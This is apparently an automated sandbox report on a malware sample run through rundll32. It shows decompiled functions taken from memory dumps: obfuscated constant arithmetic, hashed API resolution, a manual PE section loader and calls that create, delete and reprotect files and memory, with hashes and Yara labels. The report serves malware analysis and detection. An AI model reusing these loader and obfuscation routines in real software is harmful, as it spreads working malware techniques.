                          																		if( *(_v72 + 0x14) == 0) {
                          																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
                          																			L47:
                          																			goto L49;
                          																		}
                          																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
                          																		_v92 = _v96( *0x100870fc,  *0x10087100,  *0x10087104);
                          																		if(_v92 != 0) {
                          																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
                          																			goto L47;
                          																		}
                          																		 *0x10047228(0x45a);
                          																		L50:
                          																		E10003310(_v100, _v72);
                          																		return 0;
                          																	}
                          																	goto L50;
                          																}
                          																goto L50;
                          															}
                          															goto L50;
                          														}
                          														goto L50;
                          													}
                          													goto L50;
                          												}
                          												 *0x10047238(_v24, 0, 0x8000);
                          												 *0x10047228(0xe);
                          												return 0;
                          											}
                          											_t223 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
                          											_v24 = _t223;
                          											if(_v24 != 0) {
                          												goto L26;
                          											}
                          											 *0x10047228(0xe);
                          											return 0;
                          										}
                          										 *0x10047228(0xc1);
                          										return 0;
                          									}
                          									 *0x10047228(0xc1);
                          									return 0;
                          								}
                          								 *0x10047228(0xc1);
                          								return 0;
                          							}
                          							 *0x10047228(0xc1);
                          							return 0;
                          						}
                          						return 0;
                          					}
                          					 *0x10047228(0xc1);
                          					return 0;
                          				}
                          				return 0;
                          			}



























                          Memory Dump Source
                          • Source File: 00000005.00000002.425480374.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000005.00000002.425473612.0000000010000000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 122cb37b0b289274c351768ce399d3c8904b2a50bbd0f0c9b0cc6582413b1c49
                          • Instruction ID: 8eda3ac1f8f3e078098bdc719848e1594ce6d4798074e02e4610946cd2a58ef5
                          • Opcode Fuzzy Hash: 122cb37b0b289274c351768ce399d3c8904b2a50bbd0f0c9b0cc6582413b1c49
                          • Instruction Fuzzy Hash: 7CE1E774A00209DFEB05CF94C994AAEB7B6FF8C344F208559E909AB399D770ED42CB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 95%
                          			E03681538(void* __ecx, void* __edx, void* _a4) {
                          				signed int _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				void* _t59;
                          				int _t75;
                          				signed int _t77;
                          				signed int _t78;
                          				signed int _t79;
                          				signed int _t80;
                          
                          				_push(_a4);
                          				E0367FE29(_t59);
                          				_v24 = _v24 & 0x00000000;
                          				_v32 = 0x73095a;
                          				_v28 = 0xd34a52;
                          				_v16 = 0xb3a153;
                          				_t77 = 0x73;
                          				_v16 = _v16 / _t77;
                          				_v16 = _v16 + 0x4fd2;
                          				_v16 = _v16 ^ 0xee3af97f;
                          				_v16 = _v16 ^ 0xee3510f4;
                          				_v20 = 0xee2064;
                          				_v20 = _v20 << 0xe;
                          				_v20 = _v20 ^ 0x88190a0a;
                          				_v12 = 0x72c7a5;
                          				_v12 = _v12 + 0x7839;
                          				_t78 = 0x77;
                          				_v12 = _v12 / _t78;
                          				_t79 = 0x76;
                          				_v12 = _v12 / _t79;
                          				_v12 = _v12 ^ 0x00040652;
                          				_v8 = 0x10c7fb;
                          				_t80 = 0x6c;
                          				_v8 = _v8 * 0x70;
                          				_v8 = _v8 << 8;
                          				_v8 = _v8 / _t80;
                          				_v8 = _v8 ^ 0x00c83f8f;
                          				E0366EB52(_t80, _t80, 0x2aa4bac1, 0x108, 0xa2289af1);
                          				_t75 = FindCloseChangeNotification(_a4); // executed
                          				return _t75;
                          			}

















                          APIs
                          • FindCloseChangeNotification.KERNEL32(00040652), ref: 03681615
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.424828975.0000000003661000.00000020.00000001.sdmp, Offset: 03660000, based on PE: true
                          • Associated: 00000005.00000002.424823283.0000000003660000.00000004.00000001.sdmp
                          • Associated: 00000005.00000002.424848934.0000000003686000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_3660000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ChangeCloseFindNotification
                          • String ID: Zs$d
                          • API String ID: 2591292051-3879001491
                          • Opcode ID: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
                          • Instruction ID: db200a73e5b6045b6c4d8e7991b47345a0a8a67ff205afdae8e7da8eac003849
                          • Opcode Fuzzy Hash: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
                          • Instruction Fuzzy Hash: 19212AB5E40309FBEB04DFA5D94999EBBB1EB40314F10C09DE618BB290D7B96B548F84
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 488 366d061-366d14b call 367fe29 call 366eb52 DeleteFileW
                          C-Code - Quality: 85%
                          			E0366D061(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                          				signed int _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				void* _t54;
                          				int _t63;
                          				signed int _t65;
                          				WCHAR* _t69;
                          
                          				_push(_a12);
                          				_t69 = __ecx;
                          				_push(_a8);
                          				_push(_a4);
                          				_push(__ecx);
                          				E0367FE29(_t54);
                          				_v28 = _v28 & 0x00000000;
                          				_v24 = _v24 & 0x00000000;
                          				_v36 = 0xa62646;
                          				_v32 = 0x27199b;
                          				_v20 = 0x942c55;
                          				_v20 = _v20 | 0xf0368afe;
                          				_v20 = _v20 << 0xa;
                          				_v20 = _v20 ^ 0xfbcaf84d;
                          				_v20 = _v20 ^ 0x217d6c33;
                          				_v16 = 0xf28622;
                          				_v16 = _v16 >> 0xe;
                          				_v16 = _v16 | 0xeb4a9877;
                          				_v16 = _v16 ^ 0x2aded5e4;
                          				_v16 = _v16 ^ 0xc19eb21f;
                          				_v12 = 0x4a5837;
                          				_v12 = _v12 ^ 0xa3e571b7;
                          				_v12 = _v12 + 0xffff6305;
                          				_t65 = 0x6e;
                          				_v12 = _v12 / _t65;
                          				_v12 = _v12 ^ 0x01794185;
                          				_v8 = 0xa209ee;
                          				_v8 = _v8 + 0x62d2;
                          				_v8 = _v8 ^ 0x3d892cf6;
                          				_v8 = _v8 | 0x5ca7d1ce;
                          				_v8 = _v8 ^ 0x7da8dabc;
                          				E0366EB52(_t65, _t65, 0x74c3d0b1, 0x1a1, 0xa2289af1);
                          				_t63 = DeleteFileW(_t69); // executed
                          				return _t63;
                          			}
















                          APIs
                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0366D145
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.424828975.0000000003661000.00000020.00000001.sdmp, Offset: 03660000, based on PE: true
                          • Associated: 00000005.00000002.424823283.0000000003660000.00000004.00000001.sdmp
                          • Associated: 00000005.00000002.424848934.0000000003686000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_3660000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DeleteFile
                          • String ID: 3l}!$7XJ
                          • API String ID: 4033686569-2205417827
                          • Opcode ID: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
                          • Instruction ID: 88e2aac65918ea9d9bbfae1829a58e22725e7d87e37390848125f4bc73ce1be0
                          • Opcode Fuzzy Hash: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
                          • Instruction Fuzzy Hash: 682145B5D01318AFDF08DFA4C98A9DEFBB0FF14304F108188E966A6210D7B85B558F91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 543 36845ca-36846bc call 367fe29 call 366eb52 CreateFileW
                          C-Code - Quality: 56%
                          			E036845CA(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24, intOrPtr _a28, intOrPtr _a32, long _a36, intOrPtr _a40, long _a44, long _a48) {
                          				signed int _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				struct _SECURITY_ATTRIBUTES* _v24;
                          				intOrPtr _v28;
                          				void* _t51;
                          				void* _t60;
                          				WCHAR* _t64;
                          
                          				_push(_a48);
                          				_t64 = __ecx;
                          				_push(_a44);
                          				_push(_a40);
                          				_push(_a36);
                          				_push(_a32);
                          				_push(_a28);
                          				_push(_a24);
                          				_push(_a20);
                          				_push(_a16);
                          				_push(_a12);
                          				_push(0);
                          				_push(0);
                          				_push(__ecx);
                          				E0367FE29(_t51);
                          				_v28 = 0x204d4f;
                          				_v24 = 0;
                          				_v20 = 0xd27984;
                          				_v20 = _v20 | 0x43788b11;
                          				_v20 = _v20 ^ 0x43f3df42;
                          				_v16 = 0xf976f1;
                          				_v16 = _v16 + 0xffff3d74;
                          				_v16 = _v16 | 0xfc5c4419;
                          				_v16 = _v16 ^ 0xfcfdb6fc;
                          				_v12 = 0xb7df7c;
                          				_v12 = _v12 + 0xffff3658;
                          				_v12 = _v12 * 0x13;
                          				_v12 = _v12 ^ 0x1f30f970;
                          				_v12 = _v12 ^ 0x12ab006a;
                          				_v8 = 0x8ba8ca;
                          				_v8 = _v8 | 0x62aa166a;
                          				_v8 = _v8 + 0xa2f6;
                          				_v8 = _v8 * 0x55;
                          				_v8 = _v8 ^ 0xc33acf6c;
                          				E0366EB52(__ecx, __ecx, 0xbc17bbde, 0x19f, 0xa2289af1);
                          				_t60 = CreateFileW(_t64, _a24, _a48, 0, _a44, _a36, 0); // executed
                          				return _t60;
                          			}













                          APIs
                          • CreateFileW.KERNEL32(?,00000057,?,00000000,?,?,00000000), ref: 036846B5
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.424828975.0000000003661000.00000020.00000001.sdmp, Offset: 03660000, based on PE: true
                          • Associated: 00000005.00000002.424823283.0000000003660000.00000004.00000001.sdmp
                          • Associated: 00000005.00000002.424848934.0000000003686000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_3660000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID: OM
                          • API String ID: 823142352-4198367855
                          • Opcode ID: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
                          • Instruction ID: 3581b482429b22799e8cb14ddc48560b991952b7e6f5eb2a7d092c2b763e29bb
                          • Opcode Fuzzy Hash: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
                          • Instruction Fuzzy Hash: A421EE72801249BBCF05DFA9CE45CDEBFB5EF88304F508199F914A6220D3768A61AF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph for function 10002690 (legend: Executed / Not Executed)
                          C-Code - Quality: 81%
                          			E10002690(intOrPtr __ecx, intOrPtr* _a4, void** _a8) {
                          				long _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				intOrPtr _v28;
                          				int _t67;
                          
                          				_v28 = __ecx;
                          				if(_a8[2] != 0) {
                          					if((_a8[3] & 0x02000000) == 0) {
                          						asm("sbb ecx, ecx");
                          						_v16 =  ~( ~(_a8[3] & 0x20000000));
                          						asm("sbb eax, eax");
                          						_v24 =  ~( ~(_a8[3] & 0x40000000));
                          						asm("sbb edx, edx");
                          						_v12 =  ~( ~(_a8[3] & 0x80000000));
                          						_v20 =  *((intOrPtr*)((_v16 << 4) + 0x1008444c + _v24 * 8 + _v12 * 4));
                          						if((_a8[3] & 0x04000000) != 0) {
                          							_v20 = _v20 | 0x00000200;
                          						}
                          						_t67 = VirtualProtect( *_a8, _a8[2], _v20,  &_v8); // executed
                          						if(_t67 != 0) {
                          							return 1;
                          						} else {
                          							return 0;
                          						}
                          					}
                          					if( *_a8 == _a8[1] && (_a8[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x30) || _a8[2] %  *(_a4 + 0x30) == 0)) {
                          						VirtualFree( *_a8, _a8[2], 0x4000); // executed
                          					}
                          					return 1;
                          				}
                          				return 1;
                          			}











                          APIs
                          • VirtualFree.KERNELBASE(?,00000000,00004000), ref: 10002704
                          Memory Dump Source
                          • Source File: 00000005.00000002.425480374.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000005.00000002.425473612.0000000010000000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                          Similarity
                          • API ID: FreeVirtual
                          • String ID:
                          • API String ID: 1263568516-0
                          • Opcode ID: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
                          • Instruction ID: e47a27f64338b3e84d430cb899d867ed3d67d72a97b2c0655aeaec8263a425f7
                          • Opcode Fuzzy Hash: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
                          • Instruction Fuzzy Hash: 8841B77461410AAFEB48CF58C490BA9B7B2FB88364F14C659EC1A9F355C731EE41CB84
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 76%
                          			E0367648A(long __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, long _a16) {
                          				signed int _v8;
                          				unsigned int _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				void* _t41;
                          				void* _t49;
                          				long _t52;
                          
                          				_push(_a16);
                          				_t52 = __ecx;
                          				_push(_a12);
                          				_push(_a8);
                          				_push(_a4);
                          				_push(__ecx);
                          				E0367FE29(_t41);
                          				_v12 = 0x3cd3f;
                          				_v12 = _v12 << 3;
                          				_v12 = _v12 | 0xc677f757;
                          				_v12 = _v12 >> 7;
                          				_v12 = _v12 ^ 0x0188bcff;
                          				_v20 = 0x40fc9e;
                          				_v20 = _v20 << 4;
                          				_v20 = _v20 ^ 0x040306b1;
                          				_v16 = 0x159e9f;
                          				_v16 = _v16 + 0xffffd0d5;
                          				_v16 = _v16 * 0x33;
                          				_v16 = _v16 ^ 0x04433238;
                          				_v8 = 0x8a430d;
                          				_v8 = _v8 + 0xffffdfbc;
                          				_v8 = _v8 | 0x5356d001;
                          				_v8 = _v8 + 0x638e;
                          				_v8 = _v8 ^ 0x53d0144a;
                          				E0366EB52(__ecx, __ecx, 0x958aafc8, 0x1c3, 0xa2289af1);
                          				_t49 = RtlAllocateHeap(_a12, _a16, _t52); // executed
                          				return _t49;
                          			}











                          APIs
                          • RtlAllocateHeap.NTDLL(040306B1,?,ED94606E,?,?,?,?,?,?,?,?,?,?,?), ref: 03676543
                          Memory Dump Source
                          • Source File: 00000005.00000002.424828975.0000000003661000.00000020.00000001.sdmp, Offset: 03660000, based on PE: true
                          • Associated: 00000005.00000002.424823283.0000000003660000.00000004.00000001.sdmp
                          • Associated: 00000005.00000002.424848934.0000000003686000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_3660000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
                          • Instruction ID: 65084e7cc8d6bfcc845722305180ce6e2af1881f49c8b91a07bb5f48de3a1382
                          • Opcode Fuzzy Hash: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
                          • Instruction Fuzzy Hash: B21100B6C0121DFBDF06DFA5D9098CEBBB4FB00314F108598E821AA250E3B59B249F91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 70%
                          			E0367E8B6(void* __ecx, void* __edx, intOrPtr _a4, int _a12, intOrPtr _a16) {
                          				signed int _v8;
                          				signed int _v12;
                          				unsigned int _v16;
                          				signed int _v20;
                          				void* _t29;
                          				void* _t37;
                          
                          				_push(_a16);
                          				_push(_a12);
                          				_push(0);
                          				_push(_a4);
                          				_push(0);
                          				E0367FE29(_t29);
                          				_v20 = 0xc8e76b;
                          				_v20 = _v20 | 0x270203a1;
                          				_v20 = _v20 ^ 0x27c97096;
                          				_v16 = 0x55aebc;
                          				_v16 = _v16 >> 2;
                          				_v16 = _v16 ^ 0x00171a80;
                          				_v12 = 0xfad6fe;
                          				_v12 = _v12 ^ 0xd14a4d1d;
                          				_v12 = _v12 ^ 0xd1b10da7;
                          				_v8 = 0x428060;
                          				_v8 = _v8 * 0x54;
                          				_v8 = _v8 ^ 0x15de1a76;
                          				E0366EB52(__ecx, __ecx, 0x3c0b385, 0x1bc, 0x1f76e49f);
                          				_t37 = OpenSCManagerW(0, 0, _a12); // executed
                          				return _t37;
                          			}










                          APIs
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,27C97096,?,?,?,?,?,?,?,?,?,?,?), ref: 0367E94E
                          Memory Dump Source
                          • Source File: 00000005.00000002.424828975.0000000003661000.00000020.00000001.sdmp, Offset: 03660000, based on PE: true
                          • Associated: 00000005.00000002.424823283.0000000003660000.00000004.00000001.sdmp
                          • Associated: 00000005.00000002.424848934.0000000003686000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_3660000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ManagerOpen
                          • String ID:
                          • API String ID: 1889721586-0
                          • Opcode ID: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
                          • Instruction ID: b3812c85029499460e39bf2041330a53d5eda347fc5a28c74fe7abdd83c48802
                          • Opcode Fuzzy Hash: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
                          • Instruction Fuzzy Hash: 3A11157190221DFB9B04EFA89A468DEBFB4EB04304F108588E825A6211D3B18B149B95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0367D11A() {
                          				unsigned int _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				void* _t39;
                          
                          				_v24 = _v24 & 0x00000000;
                          				_v36 = 0x78f5c7;
                          				_v32 = 0xa12bb9;
                          				_v28 = 0x4eca09;
                          				_v8 = 0x8b256f;
                          				_v8 = _v8 << 0xb;
                          				_v8 = _v8 ^ 0x4a7d0011;
                          				_v8 = _v8 >> 9;
                          				_v8 = _v8 ^ 0x00073d60;
                          				_v20 = 0x1e549a;
                          				_v20 = _v20 + 0xffffad33;
                          				_v20 = _v20 ^ 0x00134b4f;
                          				_v16 = 0x8dd9dd;
                          				_v16 = _v16 << 3;
                          				_v16 = _v16 ^ 0x0460bc3c;
                          				_v12 = 0x358059;
                          				_v12 = _v12 + 0xb97b;
                          				_v12 = _v12 ^ 0x003502df;
                          				E0366EB52(_t39, _t39, 0x83891850, 0x1c, 0xa2289af1);
                          				ExitProcess(0);
                          			}













                          APIs
                          • ExitProcess.KERNEL32(00000000), ref: 0367D1B6
                          Memory Dump Source
                          • Source File: 00000005.00000002.424828975.0000000003661000.00000020.00000001.sdmp, Offset: 03660000, based on PE: true
                          • Associated: 00000005.00000002.424823283.0000000003660000.00000004.00000001.sdmp
                          • Associated: 00000005.00000002.424848934.0000000003686000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_3660000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID:
                          • API String ID: 621844428-0
                          • Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
                          • Instruction ID: 1f913a59e8becfc2127a31cc17ca15852d3c291f9ccc01d06b04488c726fe4ed
                          • Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
                          • Instruction Fuzzy Hash: 0A1100B1C4030CEBDB44DFE5DA4A69EBBB0EB00748F108588D521B6240D3B89A489F90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E100024D0(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                          				intOrPtr _v8;
                          				void* _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				void* _t76;
                          				void* _t127;
                          
                          				_v28 = __ecx;
                          				_v20 =  *((intOrPtr*)(_a16 + 4));
                          				_v24 =  *_a16 + ( *( *_a16 + 0x14) & 0x0000ffff) + 0x18;
                          				_v8 = 0;
                          				while(_v8 < ( *( *_a16 + 6) & 0x0000ffff)) {
                          					if( *(_v24 + 0x10) != 0) {
                          						if(E100024A0(_v28, _a8,  *((intOrPtr*)(_v24 + 0x14)) +  *(_v24 + 0x10)) != 0) {
                          							_t76 = VirtualAlloc(_v20 +  *((intOrPtr*)(_v24 + 0xc)),  *(_v24 + 0x10), 0x1000, 4); // executed
                          							_v12 = _t76;
                          							if(_v12 != 0) {
                          								_v12 = _v20 +  *((intOrPtr*)(_v24 + 0xc));
                          								E10002320(_v12, _a4 +  *((intOrPtr*)(_v24 + 0x14)),  *(_v24 + 0x10));
                          								_t127 = _t127 + 0xc;
                          								 *((intOrPtr*)(_v24 + 8)) = _v12;
                          								L1:
                          								_v8 = _v8 + 1;
                          								_v24 = _v24 + 0x28;
                          								continue;
                          							}
                          							return 0;
                          						}
                          						return 0;
                          					}
                          					_v16 =  *((intOrPtr*)(_a12 + 0x38));
                          					if(_v16 <= 0) {
                          						L8:
                          						goto L1;
                          					}
                          					_v12 =  *0x10047220(_v20 +  *((intOrPtr*)(_v24 + 0xc)), _v16, 0x1000, 4);
                          					if(_v12 != 0) {
                          						_v12 = _v20 +  *((intOrPtr*)(_v24 + 0xc));
                          						 *((intOrPtr*)(_v24 + 8)) = _v12;
                          						E100022D0(_v12, 0, _v16);
                          						_t127 = _t127 + 0xc;
                          						goto L8;
                          					}
                          					return 0;
                          				}
                          				return 1;
                          			}












                          APIs
                          • VirtualAlloc.KERNEL32(?,00000000,00001000,00000004), ref: 100025CC
                          Memory Dump Source
                          • Source File: 00000005.00000002.425480374.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000005.00000002.425473612.0000000010000000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: d2bbee85c6cabd151e34b26d14f83d277689191624d3873c1df0f1bcce928bde
                          • Instruction ID: f227e8c1e280d8d0b8d11f9a2f1445d4c625449e48c39147985fdcb30a9e5b67
                          • Opcode Fuzzy Hash: d2bbee85c6cabd151e34b26d14f83d277689191624d3873c1df0f1bcce928bde
                          • Instruction Fuzzy Hash: FE51E9B4A0010AEFDB04CF94C990AAEB7F1FF48345F248598E905AB345D370EE91CBA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E0368061D(signed int __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                          				signed int _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				intOrPtr _v28;
                          				void* _t44;
                          				int _t53;
                          				WCHAR* _t56;
                          
                          				_push(_a12);
                          				_t56 = __edx;
                          				_push(_a8);
                          				_push(_a4);
                          				_push(__edx);
                          				_push(__ecx);
                          				E0367FE29(_t44);
                          				_v24 = _v24 & 0x00000000;
                          				_v28 = 0xcd60b7;
                          				_v12 = 0x7257ab;
                          				_v12 = _v12 << 0xd;
                          				_v12 = _v12 + 0x8f69;
                          				_v12 = _v12 * 0x4c;
                          				_v12 = _v12 ^ 0x410f7a13;
                          				_v8 = 0x7b4696;
                          				_v8 = _v8 + 0xffff4950;
                          				_v8 = _v8 | 0x2a0f624b;
                          				_v8 = _v8 * 0x3a;
                          				_v8 = _v8 ^ 0xa0f3ec54;
                          				_v20 = 0x8a2161;
                          				_v20 = _v20 + 0xffff45ea;
                          				_v20 = _v20 ^ 0x1b6c7fa6;
                          				_v20 = _v20 ^ 0x1be8dede;
                          				_v16 = 0xdcc12a;
                          				_v16 = _v16 + 0xb9f4;
                          				_v16 = _v16 + 0xffffcfef;
                          				_v16 = _v16 ^ 0x00d9de04;
                          				E0366EB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
                          				_t53 = lstrcmpiW(_a4, _t56); // executed
                          				return _t53;
                          			}













                          APIs
                          • lstrcmpiW.KERNEL32(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 036806E5
                          Memory Dump Source
                          • Source File: 00000005.00000002.424828975.0000000003661000.00000020.00000001.sdmp, Offset: 03660000, based on PE: true
                          • Associated: 00000005.00000002.424823283.0000000003660000.00000004.00000001.sdmp
                          • Associated: 00000005.00000002.424848934.0000000003686000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_3660000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcmpi
                          • String ID:
                          • API String ID: 1586166983-0
                          • Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                          • Instruction ID: d2d2b1f0630fa6096a77f0da09432d5fc5db64c8dc3ff327791c346dd35bc624
                          • Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                          • Instruction Fuzzy Hash: 66210FB5C0130AABCF14DFA9D98999EBFB5FB20354F108298E529A6251D3B58B04CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions